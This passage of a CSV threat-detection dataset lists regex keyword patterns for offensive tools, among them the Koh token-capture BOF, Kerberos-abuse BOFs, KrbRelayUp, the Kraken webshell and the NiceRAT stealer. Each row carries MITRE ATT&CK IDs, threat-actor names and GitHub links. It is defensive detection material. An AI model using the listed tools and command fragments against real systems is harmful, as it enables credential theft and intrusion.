- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh groups LUID*",".{0,1000}koh\sgroups\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh impersonate LUID*",".{0,1000}koh\simpersonate\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh release all*",".{0,1000}koh\srelease\sall.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*koh release LUID*",".{0,1000}koh\srelease\sLUID.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe capture*",".{0,1000}Koh\.exe\scapture.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe list*",".{0,1000}Koh\.exe\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*Koh.exe monitor*",".{0,1000}Koh\.exe\smonitor.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*kost/revsocks*",".{0,1000}kost\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*kpcyrd/badtouch*",".{0,1000}badtouch.{0,1000}","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","4","385","46","2023-12-19T14:50:40Z","2018-03-15T22:27:56Z" "*kpfopkelmapcoipemfendmdcghnegimn*",".{0,1000}kpfopkelmapcoipemfendmdcghnegimn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*KPortScan.exe*",".{0,1000}KPortScan\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan.rar*",".{0,1000}KPortScan\.rar.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan.zip*",".{0,1000}KPortScan\.zip.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*KPortScan3.exe*",".{0,1000}KPortScan3\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*krackattacks*",".{0,1000}krackattacks.{0,1000}","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","10","3289","768","2024-02-22T09:32:42Z","2017-10-18T12:58:08Z" "*Kraken Mask by @DallasFR*",".{0,1000}Kraken\sMask\sby\s\@DallasFR.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*kraken.py --connect --mode * --profile * --compiler *",".{0,1000}kraken\.py\s\-\-connect\s\-\-mode\s.{0,1000}\s\-\-profile\s.{0,1000}\s\-\-compiler\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Kraken-1.2.0.zip*",".{0,1000}Kraken\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*KrakenMask-main*",".{0,1000}KrakenMask\-main.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*kraken-ng/Kraken*",".{0,1000}kraken\-ng\/Kraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*krb_asktgs /*",".{0,1000}krb_asktgs\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_asktgt /*",".{0,1000}krb_asktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_asreproasting*",".{0,1000}krb_asreproasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_changepw /*",".{0,1000}krb_changepw\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*KRB_CRED kirbi *",".{0,1000}KRB_CRED\skirbi\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KRB_CRED(kirbiBytes)*",".{0,1000}KRB_CRED\(kirbiBytes\).{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*krb_cross_s4u /*",".{0,1000}krb_cross_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_describe /*",".{0,1000}krb_describe\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_dump /*",".{0,1000}krb_dump\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_hash /password*",".{0,1000}krb_hash\s\/password.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_klist /*",".{0,1000}krb_klist\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 